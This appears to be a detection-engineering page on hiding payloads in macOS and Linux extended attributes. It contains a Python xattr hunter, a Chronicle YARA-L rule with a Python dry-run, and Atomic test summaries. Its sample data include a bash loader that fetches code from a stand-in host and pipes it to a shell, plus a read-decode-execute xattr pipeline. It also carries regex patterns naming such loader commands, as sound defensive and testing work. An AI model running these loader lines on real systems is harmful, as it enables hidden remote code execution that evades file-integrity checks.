T1564.014 Google Chronicle · YARA-L

Detect Extended Attributes in Google Chronicle

Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide malicious data and evade detection. Extended attributes are key-value pairs of metadata attached to files and directories; ls, cat, and Finder do not display their contents (macOS ls -l only marks files that carry them with an @ suffix), so inspecting them takes a dedicated utility: xattr on macOS, or getfattr/setfattr on Linux. An adversary embeds a Base64-encoded second-stage payload in an xattr of a legitimate file (xattr -w on macOS, setfattr -n NAME -v VALUE on Linux), then a loader retrieves the attribute value (xattr -p or getfattr --only-values), decodes it, and pipes it to a scripting interpreter (bash, python, etc.) for execution. Because the file's content, and therefore its cryptographic hash, is unchanged, hash-based file integrity monitoring and hash-based detection will not flag the carrier file; what does change is the inode's ctime, which is the only file-level trace a metadata-aware FIM or a periodic xattr inventory can key on. This technique has been observed in Lazarus Group (APT38) campaigns where custom xattr names mimicking system attributes were used to store encrypted shellcode.
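The hunting side of the paragraph above, as an added example (it is not code from Argus or from any vendor tool): score each xattr name/value pair the way an analyst triages it (unrecognised or vendor-mimicking name, a value that base64-decodes, decoded text that looks like a loader) and reproduce the hash-invariance proof. The baseline name list, the weights, the SAMPLE_PAYLOAD and the file paths are assumptions for illustration; os.listxattr/os.getxattr/os.setxattr are exposed by CPython on Linux only, so on macOS list attributes with xattr -l and pass each pair to classify().

```python
"""Hunt for staged payloads in extended attributes (T1564.014).

Added example for this page, not code from Argus or any vendor. Scores xattr
name/value pairs the way a hunter triages them and reproduces the FIM-evasion
proof (hash unchanged, ctime moved). Linux only for the filesystem calls.
"""
import base64
import binascii
import hashlib
import os
import re
import sys

# Names routinely present on macOS/Linux files (assumed baseline; extend per fleet).
BENIGN_NAMES = {
    "com.apple.quarantine", "com.apple.metadata:_kMDItemUserTags",
    "com.apple.FinderInfo", "com.apple.lastuseddate#PS",
    "com.apple.ResourceFork", "com.apple.provenance",
    "security.selinux", "system.posix_acl_access", "system.posix_acl_default",
}
VENDOR_PREFIXES = ("com.apple.", "system.", "security.", "trusted.")
B64_ALPHABET = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
# Tokens that betray a loader once the value is decoded.
LOADER_TOKENS = re.compile(
    rb"(#!/bin/(ba)?sh|/bin/(ba)?sh\b|curl\s|wget\s|base64\s+(-d|-D|--decode)|"
    rb"python3?\s+-c|subprocess\.|os\.system|exec\(|eval\()")
WEIGHTS = {  # assumed scoring, capped at 100
    "unrecognised name": 20,
    "unlisted name inside a vendor/system namespace (possible mimicry)": 30,
    "value base64-decodes": 25,
    "decoded content contains loader tokens": 40,
    "plaintext value contains loader tokens": 40,
    "oversized value": 15,
}
# Constructed sample: a second-stage loader exactly as the text describes it.
SAMPLE_PAYLOAD = b"#!/bin/bash\ncurl http://example.invalid/x | bash\n"
SAMPLE_VALUE = base64.b64encode(SAMPLE_PAYLOAD)


def try_base64(value: bytes):
    """Return decoded bytes when value is plausibly base64, otherwise None."""
    compact = b"".join(value.split())
    if len(compact) < 16 or len(compact) % 4 or not B64_ALPHABET.match(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(name: str, value: bytes) -> dict:
    """Score one attribute; returns name, score and the reasons that fired."""
    if name in BENIGN_NAMES:
        return {"name": name, "score": 0, "reasons": []}
    reasons = []
    if name.startswith(VENDOR_PREFIXES):
        reasons.append("unlisted name inside a vendor/system namespace (possible mimicry)")
    else:
        reasons.append("unrecognised name")
    decoded = try_base64(value)
    if decoded is not None:
        reasons.append("value base64-decodes")
        if LOADER_TOKENS.search(decoded):
            reasons.append("decoded content contains loader tokens")
    elif LOADER_TOKENS.search(value):
        reasons.append("plaintext value contains loader tokens")
    if len(value) > 4096:
        reasons.append("oversized value")
    return {"name": name, "score": min(100, sum(WEIGHTS[r] for r in reasons)),
            "reasons": reasons}


def scan_file(path: str) -> dict:
    """Inventory every xattr on one file alongside its content hash (Linux)."""
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()
    findings = [classify(n, os.getxattr(path, n)) for n in os.listxattr(path)]
    return {"path": path, "sha256": digest, "findings": findings}


def stage_and_verify(path: str, name: str, payload: bytes) -> dict:
    """Repeat the FIM-evasion proof: hash and mtime survive os.setxattr
    unchanged, while ctime moves (subject to the kernel's timestamp granularity)."""
    before = os.stat(path)
    h_before = scan_file(path)["sha256"]
    os.setxattr(path, name, base64.b64encode(payload))
    after = os.stat(path)
    return {"hash_unchanged": h_before == scan_file(path)["sha256"],
            "mtime_unchanged": before.st_mtime_ns == after.st_mtime_ns,
            "ctime_changed": before.st_ctime_ns != after.st_ctime_ns}


if __name__ == "__main__":
    # Usage: python3 xattr_hunt.py /path [/path ...]; prints findings scoring 50 or more.
    for target in sys.argv[1:] or ["."]:
        files = [target] if os.path.isfile(target) else (
            os.path.join(d, f) for d, _, fs in os.walk(target) for f in fs)
        for p in files:
            try:
                report = scan_file(p)
            except OSError:
                continue
            for f in report["findings"]:
                if f["score"] >= 50:
                    print(f"{p}\t{f['name']}\tscore={f['score']}\t{', '.join(f['reasons'])}")
```

Run it against a directory an EDR would normally ignore (user caches, build output); the point of the name check is that a baseline of known attribute names is what turns "mimics com.apple.*" from noise into a signal, and the decode check is what separates a versioning tag from a stager.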

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1564 Hide Artifacts
Sub-technique
T1564.014 Extended Attributes
Canonical reference
https://attack.mitre.org/techniques/T1564/014/

YARA-L Detection Query

Google Chronicle (YARA-L)
```yaral
rule t1564_014_extended_attribute_abuse {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects Extended Attribute (xattr/setfattr/getfattr) abuse for payload staging and execution evasion on macOS and Linux (T1564.014)"
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1564.014"
    severity = "HIGH"
    confidence = "HIGH"
    reference = "https://attack.mitre.org/techniques/T1564/014/"
    created = "2026-04-21"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    $e.principal.hostname = $hostname
    $e.principal.user.userid = $user
    $e.target.process.command_line = $cmdline

    (
      // macOS: xattr write (-w, including combined forms such as -wx / -xw) embedding a payload
      (
        re.regex($e.target.process.file.full_path, `/xattr$`) and
        re.regex($e.target.process.command_line, `\s-[rsx]*w[rsx]*\s`)
      ) or
      // Linux: setfattr writing an attribute (-n NAME or --name=NAME)
      (
        re.regex($e.target.process.file.full_path, `/setfattr$`) and
        re.regex($e.target.process.command_line, `\s(-n|--name)[\s=]`)
      ) or
      // Linux: getfattr extracting a raw value (--only-values) or choosing an encoding (-e base64)
      (
        re.regex($e.target.process.file.full_path, `/getfattr$`) and
        re.regex($e.target.process.command_line, `(--only-values|\s-e\s|--encoding)`)
      ) or
      // macOS: xattr read (-p, including -px / -xp) retrieving the stored payload
      (
        re.regex($e.target.process.file.full_path, `/xattr$`) and
        re.regex($e.target.process.command_line, `\s-[rsx]*p[rsx]*\s`)
      ) or
      // Interpreter launched from a shell or xattr/getfattr parent with decode/exec patterns
      (
        re.regex($e.target.process.file.full_path, `/(bash|sh|zsh|python3?|perl|ruby)$`) and
        re.regex($e.target.process.parent_process.file.full_path, `/(xattr|getfattr|bash|sh|zsh)$`) and
        (
          re.regex($e.target.process.parent_process.command_line, `(xattr\s+-[rsx]*p|getfattr\s+--only-values)`) or
          re.regex($e.target.process.command_line, `(base64\s+(-d|-D|--decode)|\|\s*(ba)?sh\b|\|\s*python|eval\(|exec\()`)
        )
      )
    )

    // Exclusion: common benign Apple attribute names. This is a substring test on the whole
    // command line, so an attacker who appends one of these names suppresses the alert.
    not re.regex($e.target.process.command_line,
      `(com\.apple\.quarantine|com\.apple\.metadata|com\.apple\.FinderInfo|com\.apple\.lastuseddate|com\.apple\.ResourceFork)`
    )

  match:
    $hostname, $user over 30m

  outcome:
    // With a match window, outcome values derived from event fields must be aggregated.
    $risk_score = max(
      if(re.regex($cmdline, `(base64|b64decode|frombase64|\s-d\b|--decode)`) and
         re.regex($cmdline, `(\|\s*(ba)?sh\b|\|\s*python|eval\(|exec\()`), 90,
      if(re.regex($cmdline, `(\|\s*(ba)?sh\b|\|\s*python|eval\(|exec\()`), 75,
      if(re.regex($cmdline, `(user\.|trusted\.|security\.)`), 60,
      50)))
    )
    $has_base64 = max(if(re.regex($cmdline, `(base64|b64decode|frombase64)`), 1, 0))
    $has_exec_pipe = max(if(re.regex($cmdline, `(\|\s*(ba)?sh\b|\|\s*python|eval\(|exec\()`), 1, 0))
    $is_write = max(if(re.regex($cmdline, `(\s-[rsx]*w[rsx]*\s|setfattr)`), 1, 0))
    $is_read = max(if(re.regex($cmdline, `(\s-[rsx]*p[rsx]*\s|--only-values)`), 1, 0))
    $command_lines = array_distinct($cmdline)

  condition:
    $e
}
```

Chronicle YARA-L 2.0 rule detecting Extended Attribute abuse (T1564.014) from UDM PROCESS_LAUNCH events. It matches xattr/setfattr/getfattr write and read invocations and interpreter launches whose command line carries base64-decode or pipe-to-interpreter patterns, excludes the common benign Apple attribute names, and groups hits per host and user over 30 minutes. Outcome scoring ranks a single command line that both decodes and executes highest (90), a pipe to an interpreter alone next (75), then writes into the user./trusted./security. namespaces (60), with 50 as the floor. The score is computed from each process's own command line, so a pipeline split across processes scores highest on the parent shell's -c string, not on the xattr, base64 or bash child.
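To dry-run the rule's events and outcome logic before deploying it, the following Python port (an added example, not Chronicle or Argus code) replays the same regexes over constructed UDM-shaped process-launch events that mirror the Atomic tests in the Testing Methodology section plus two benign cases. Hostnames, user IDs, paths and the attribute values are fabricated; the patterns use RE2-compatible syntax so they carry over to re.regex unchanged.

```python
"""Dry-run of the YARA-L events/outcome logic against constructed UDM events.

Added example for this page; it is not Chronicle or Argus code. Sample events
are fabricated to mirror the Atomic tests on the page plus two benign cases.
"""
import re

XATTR_BIN = re.compile(r"/xattr$")
XATTR_WRITE = re.compile(r"\s-[rsx]*w[rsx]*\s")
XATTR_READ = re.compile(r"\s-[rsx]*p[rsx]*\s")
SETFATTR_BIN = re.compile(r"/setfattr$")
SETFATTR_SET = re.compile(r"\s(-n|--name)[\s=]")
GETFATTR_BIN = re.compile(r"/getfattr$")
GETFATTR_RAW = re.compile(r"(--only-values|\s-e\s|--encoding)")
INTERP_BIN = re.compile(r"/(bash|sh|zsh|python3?|perl|ruby)$")
SHELL_PARENT = re.compile(r"/(xattr|getfattr|bash|sh|zsh)$")
PARENT_READ = re.compile(r"(xattr\s+-[rsx]*p|getfattr\s+--only-values)")
DECODE_EXEC = re.compile(r"(base64\s+(-d|-D|--decode)|\|\s*(ba)?sh\b|\|\s*python|eval\(|exec\()")
EXEC_PIPE = re.compile(r"(\|\s*(ba)?sh\b|\|\s*python|eval\(|exec\()")
B64_HINT = re.compile(r"(base64|b64decode|frombase64|\s-d\b|--decode)")
NAMESPACE = re.compile(r"(user\.|trusted\.|security\.)")
APPLE_BENIGN = re.compile(r"com\.apple\.(quarantine|metadata|FinderInfo|lastuseddate|ResourceFork)")


def matches(ev: dict) -> bool:
    """Events section for one PROCESS_LAUNCH event; dict keys mirror the UDM paths."""
    path, cmd = ev["path"], ev["cmd"]
    ppath, pcmd = ev.get("parent_path", ""), ev.get("parent_cmd", "")
    hit = (
        (XATTR_BIN.search(path) and XATTR_WRITE.search(cmd))
        or (SETFATTR_BIN.search(path) and SETFATTR_SET.search(cmd))
        or (GETFATTR_BIN.search(path) and GETFATTR_RAW.search(cmd))
        or (XATTR_BIN.search(path) and XATTR_READ.search(cmd))
        or (INTERP_BIN.search(path) and SHELL_PARENT.search(ppath)
            and (PARENT_READ.search(pcmd) or DECODE_EXEC.search(cmd)))
    )
    return bool(hit) and not APPLE_BENIGN.search(cmd)


def risk_score(cmd: str) -> int:
    """Outcome section: the nested if() that feeds max()."""
    if B64_HINT.search(cmd) and EXEC_PIPE.search(cmd):
        return 90
    if EXEC_PIPE.search(cmd):
        return 75
    if NAMESPACE.search(cmd):
        return 60
    return 50


def evaluate(events: list) -> dict:
    """Group matching events per (hostname, userid) like the 30m match window
    and keep the highest score, as max() does in the outcome section."""
    groups = {}
    for ev in events:
        if matches(ev):
            key = (ev["host"], ev["user"])
            groups[key] = max(groups.get(key, 0), risk_score(ev["cmd"]))
    return groups


SAMPLE_EVENTS = [  # constructed; hosts, users, paths and values are invented
    # Test 1 (macOS): embed the payload, then read | decode | execute via a bash -c wrapper
    {"host": "mac-01", "user": "jdoe", "path": "/usr/bin/xattr",
     "cmd": "xattr -w user.hidden_loader aGVsbG8K /tmp/df00tech_xattr_carrier.txt",
     "parent_path": "/bin/zsh", "parent_cmd": "-zsh"},
    {"host": "mac-01", "user": "jdoe", "path": "/bin/bash",
     "cmd": "bash -c xattr -p user.hidden_loader /tmp/df00tech_xattr_carrier.txt | base64 -d | bash",
     "parent_path": "/bin/zsh", "parent_cmd": "-zsh"},
    # The bash child that actually runs the decoded script: its own command line is just "bash"
    {"host": "mac-01", "user": "jdoe", "path": "/bin/bash", "cmd": "bash",
     "parent_path": "/bin/bash",
     "parent_cmd": "bash -c xattr -p user.hidden_loader /tmp/df00tech_xattr_carrier.txt | base64 -d | bash"},
    # Test 2 (Linux): setfattr write in the user. namespace
    {"host": "lnx-07", "user": "svc", "path": "/usr/bin/setfattr",
     "cmd": "setfattr -n user.system_metadata -v aGVsbG8K /tmp/df00tech_config.json",
     "parent_path": "/bin/bash", "parent_cmd": "bash"},
    # Benign: inspecting Gatekeeper's quarantine flag, dropped by the Apple name exclusion
    {"host": "mac-02", "user": "dev", "path": "/usr/bin/xattr",
     "cmd": "xattr -p com.apple.quarantine /Users/dev/Downloads/tool.dmg",
     "parent_path": "/bin/zsh", "parent_cmd": "-zsh"},
    # Benign: Xcode build phase tagging an artifact; fires at the floor score, needs an allow-list
    {"host": "mac-03", "user": "ci", "path": "/usr/bin/xattr",
     "cmd": "xattr -w com.custom.buildversion 4.2.0 build/App.app/Contents/MacOS/App",
     "parent_path": "/bin/sh", "parent_cmd": "sh build/tag_artifact.sh"},
]


if __name__ == "__main__":
    for key, score in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(f"{key[0]}/{key[1]}: risk_score={score}")
```

The third sample event is the one to watch: the bash that executes the decoded payload has a command line of just "bash" and only scores 50 on its own; the 90 comes from the wrapper shell whose -c string carries the whole pipeline. If your endpoint agent records only the children and not a wrapping shell, the group still surfaces through the xattr read clause, but the top score is never reached, which is worth knowing before tuning alert thresholds on $risk_score.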

Data Sources

  • Google Chronicle UDM (Unified Data Model)
  • macOS Endpoint Security via Chronicle connector
  • Linux auditd ingested via Chronicle Forwarder
  • CrowdStrike Falcon EDR via Chronicle ingestion

Required Tables

UDM Events (PROCESS_LAUNCH)

False Positives & Tuning

  • Enterprise MDM solutions (Jamf, Kandji, Microsoft Intune for macOS) that programmatically manage xattr metadata on managed device files as part of policy enforcement and configuration profile application
  • Developer toolchain scripts that use xattr to tag build artifacts with versioning or signing metadata — commonly seen in Xcode build phases calling xattr -w com.custom.buildversion on output binaries
  • Linux filesystem administrative tasks (e.g., Samba share management using setfattr to apply DOS attributes in user.DOSATTRIB; POSIX ACL changes made with setfacl write system.posix_acl_access through the setxattr syscall directly, so they surface in auditd syscall records rather than as a setfattr process launch)

Testing Methodology

Validate this detection against the 4 Atomic Red Team test cases below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1 (macOS): Embed Base64 Payload in Extended Attribute and Execute via Bash

    Expected signal: DeviceProcessEvents (macOS Defender): (1) xattr process with ProcessCommandLine '-w user.hidden_loader <base64_string> /tmp/df00tech_xattr_carrier.txt'; (2) xattr process with ProcessCommandLine '-p user.hidden_loader /tmp/df00tech_xattr_carrier.txt'; (3) a bash process spawned from the shell pipeline whose own command line is just 'bash', because the decoded script arrives on stdin; the full read-decode-execute chain is visible only in the invoking shell's -c string, if one exists. Unified Log: xattr invocations under the invoking shell process context. DeviceFileEvents: possible FileModified event for the carrier file if the EDR tracks xattr changes as metadata modifications.

  2. Test 2 (Linux): Store and Execute Payload via setfattr/getfattr in the user. Namespace

    Expected signal: auditd (requires execve rule): SYSCALL execve records for setfattr (TYPE=EXECVE with a[0]='setfattr', a[1]='-n', a[2]='user.system_metadata') and getfattr (with '--only-values'). DeviceProcessEvents (Defender for Linux): setfattr process with full command line, getfattr process with --only-values flag, bash process spawned via pipe. The carrier file hash (sha256sum /tmp/df00tech_config.json) remains identical before and after setfattr — demonstrating FIM evasion.

  3. Test 3 (Linux): Python Loader Extracting and Executing Xattr Payload In-Memory (APT-Style Stager)

    Expected signal: auditd: setfattr execve record writing user.app_config attribute; python3 execve record with proctitle showing subprocess.check_output, getfattr, --only-values, base64.b64decode, exec(). getfattr invoked as child process of python3 (PPID of getfattr matches PID of python3). No additional file written to disk during execution — exec() runs the decoded Python code within the existing interpreter process. DeviceProcessEvents: python3 process with full command line containing all loader indicators.

  4. Test 4 (macOS): Verify Extended Attribute Persists Through Hash Integrity Check (FIM Evasion Proof)

    Expected signal: DeviceProcessEvents: xattr process with CommandLine '-w user.evasion_test <base64_payload> /tmp/df00tech_fim_evasion_test.txt'. DeviceFileEvents: FileModified event for the carrier file if EDR tracks EA changes as file system events (EDR-dependent). SHA256 hash: identical before and after — file integrity monitoring tools relying solely on cryptographic hashes will NOT generate an alert. This outcome is expected and demonstrates the detection gap.
